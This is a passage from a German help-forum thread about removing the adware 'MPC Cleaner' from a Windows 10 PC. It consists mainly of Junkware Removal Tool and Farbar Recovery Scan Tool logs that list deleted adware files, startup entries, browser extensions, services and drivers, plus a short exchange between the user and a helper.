C:\AdwCleaner\AdwCleaner[C2].txt - [2913 Bytes] - [19/04/2016 16:11:02]
C:\AdwCleaner\AdwCleaner[S1].txt - [11464 Bytes] - [19/04/2016 12:41:05]
C:\AdwCleaner\AdwCleaner[S3].txt - [2855 Bytes] - [19/04/2016 16:08:56]

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [3133 Bytes] ##########
JRT:

Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.4 (03.14.2016)
Operating System: Windows 10 Pro x64 
Ran by Harun (Administrator) on 19.04.2016 at 16:13:33,01
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 14 

Successfully deleted: C:\ProgramData\28341ff220e0446c9fff27c4493d622e (Folder) 
Successfully deleted: C:\Users\Harun\AppData\Local\crashrpt (Folder) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\@E9438230-A7DF-4D1F-8F2D-CA1D0F0F7924.xpi (File) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\bingsearch.full@microsoft.com\search.xml (File) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js (File) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\extensions\bingsearch.full@microsoft.com\search.xml (File) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\user.js (File) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\@E9438230-A7DF-4D1F-8F2D-CA1D0F0F7924.xpi (File) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\search.xml (File) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\staged (Folder) 
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\user.js (File) 
Successfully deleted: C:\WINDOWS\prefetch\ENERGYOPTIMIZER.EXE-6E63F9A6.pf (File) 
Successfully deleted: C:\WINDOWS\prefetch\FREEYOUTUBETOMP3CONVERTER.EXE-B9007EC6.pf (File) 
Successfully deleted: C:\WINDOWS\prefetch\PERFORMANCEOPTIMIZER.EXE-7CC04A16.pf (File) 



Registry: 0 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 19.04.2016 at 16:14:45,38
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Noch ne Frage, hab derzeit kein Antivirus Programm am laufen. Was empfiehlst du mir und welchen Browser sollte ich am besten nutzen ?

Alt 19.04.2016, 15:35   #11
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Was hast du an dem Satz in meinem Posting #5 nicht verstanden??
Hinweise/Tipps gibt es wenn wir hier komplett fertig sind.


Dann zeig mal frische FRST Logs. Haken setzen bei addition.txt dann auf Untersuchen klicken

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 19.04.2016, 17:03   #12
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Tut mir leid für die Frage

Weiter im Kontext..

FRST

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:18-04-2016
durchgeführt von Harun (Administrator) auf HARUN-PC (19-04-2016 18:00:37)
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Platform: Windows 10 Pro (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.19761.0_x64__8wekyb3d8bbwe\Video.UI.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-07-29] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe [5006536 2016-04-04] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => A:\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe [186640 2016-04-14] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-04-05] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-04-05] (Raptr, Inc)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Steam] => "A:\Steam\steam.exe" -silent
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify Web Helper] => C:\Users\Harun\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [BingSvc] => C:\Users\Harun\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify] => C:\Users\Harun\AppData\Roaming\Spotify\Spotify.exe [6805616 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8813784 2016-03-11] (Piriform Ltd)
IFEO\playstv_launcher.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\raptrstub.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xfire2.bat [2016-04-10] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{f44a65a3-dc5f-4cc2-bb7a-f4d941196cd5}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-29] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-29] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF SearchEngineOrder.3: Bing 
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q=
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-2630849102-760198568-3561441068-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Harun\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [nicht gefunden]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com [2015-10-26] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com [2016-03-08] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\bingsearch.full@microsoft.com [2016-04-19] [ist nicht signiert]

Chrome: 
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=de-de
CHR StartupUrls: Default -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-08]
CHR Extension: (Adblock für Youtube™) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2016-03-05]
CHR Extension: (Google-Suche) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Google Docs Offline) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-15]
CHR Extension: (Sniper Team Game Collection) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-02-07]
CHR Extension: (Top Eleven) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljphpjlafmmdmegmfbkacafhbegjfkkn [2015-07-29]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Google Mail) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S4 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2016-04-03] (Advanced Micro Devices) [Datei ist nicht signiert]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1074448 2016-04-14] (AVG Technologies CZ, s.r.o.)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S4 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company)
S4 Origin Client Service; A:\Origin\OriginClientService.exe [2007048 2015-08-01] (Electronic Arts)
S4 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-04-05] (Plays.tv, LLC)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2015-08-01] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76152 2015-08-02] ()
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4584208 2016-03-29] (AVG Technologies CZ, s.r.o.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [296648 2016-04-04] (Advanced Micro Devices)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [111120 2016-03-01] (Advanced Micro Devices)
S3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [194320 2016-04-12] (Intel Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-03-29] (AVG Netherlands B.V.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [35880 2016-01-01] (Wellbia.com Co., Ltd.)
U3 idsvc; kein ImagePath
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; kein ImagePath
S3 XFDriver64; \??\C:\Program Files (x86)\Xfire2\XFDriver64.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-19 17:59 - 2016-04-19 17:59 - 00016148 _____ C:\WINDOWS\system32\HARUN-PC_Harun_HistoryPrediction.bin
2016-04-19 16:14 - 2016-04-19 16:14 - 00002273 _____ C:\Users\Harun\Desktop\JRT.txt
2016-04-19 16:06 - 2016-04-19 16:13 - 01610352 _____ (Malwarebytes) C:\Users\Harun\Downloads\JRT.exe
2016-04-19 16:03 - 2016-04-19 16:03 - 03683904 _____ C:\Users\Harun\Downloads\AdwCleaner_5.112 (1).exe
2016-04-19 15:33 - 2016-04-19 16:11 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-04-19 15:33 - 2016-04-19 15:47 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-04-19 15:33 - 2016-04-19 15:33 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-04-19 15:32 - 2016-04-19 15:57 - 00000000 ____D C:\Users\Harun\Desktop\mbar
2016-04-19 15:32 - 2016-04-19 15:47 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-04-19 13:09 - 2016-04-19 13:09 - 00026993 _____ C:\Users\Harun\Downloads\Logfiles.zip
2016-04-19 13:06 - 2016-04-19 13:06 - 00042195 _____ C:\Users\Harun\Downloads\Addition.txt
2016-04-19 13:05 - 2016-04-19 18:00 - 00015239 _____ C:\Users\Harun\Downloads\FRST.txt
2016-04-19 13:05 - 2016-04-19 18:00 - 00000000 ____D C:\FRST
2016-04-19 13:04 - 2016-04-19 13:05 - 02375680 _____ (Farbar) C:\Users\Harun\Downloads\FRST64.exe
2016-04-19 12:54 - 2016-04-19 12:54 - 00083140 _____ C:\Users\Harun\Downloads\Ereignisse.txt
2016-04-19 12:47 - 2016-04-19 12:47 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Harun\Downloads\Nicht bestätigt 326517.crdownload
2016-04-19 12:39 - 2016-04-19 16:11 - 00000000 ____D C:\AdwCleaner
2016-04-19 12:39 - 2016-04-19 12:39 - 03683904 _____ C:\Users\Harun\Downloads\adwcleaner_5.112.exe
2016-04-19 12:39 - 2016-04-19 12:39 - 00001391 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files\iPod
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-15 17:10 - 2016-03-29 08:40 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-15 17:10 - 2016-03-29 08:40 - 01381376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-15 17:10 - 2016-03-25 09:38 - 24593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-15 17:10 - 2016-03-25 09:25 - 12505600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-15 17:10 - 2016-03-25 09:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-15 17:10 - 2016-03-25 09:13 - 19325440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-15 17:10 - 2016-03-25 08:55 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-15 17:10 - 2016-03-25 08:54 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 03467784 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 01022664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-15 17:10 - 2016-03-16 06:56 - 00861512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01299032 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-15 17:10 - 2016-03-16 06:55 - 01127024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 00601344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-15 17:10 - 2016-03-16 06:54 - 00595016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 22610328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 00801632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:46 - 00658568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-04-15 17:10 - 2016-03-16 06:45 - 00140536 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00208736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:39 - 00983904 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-15 17:10 - 2016-03-16 06:37 - 01010016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-15 17:10 - 2016-03-16 06:21 - 01767000 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:21 - 01531888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 21088728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 00700256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:08 - 00151552 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-04-15 17:10 - 2016-03-16 06:06 - 00181088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:05 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:03 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-15 17:10 - 2016-03-16 06:03 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-15 17:10 - 2016-03-16 06:00 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
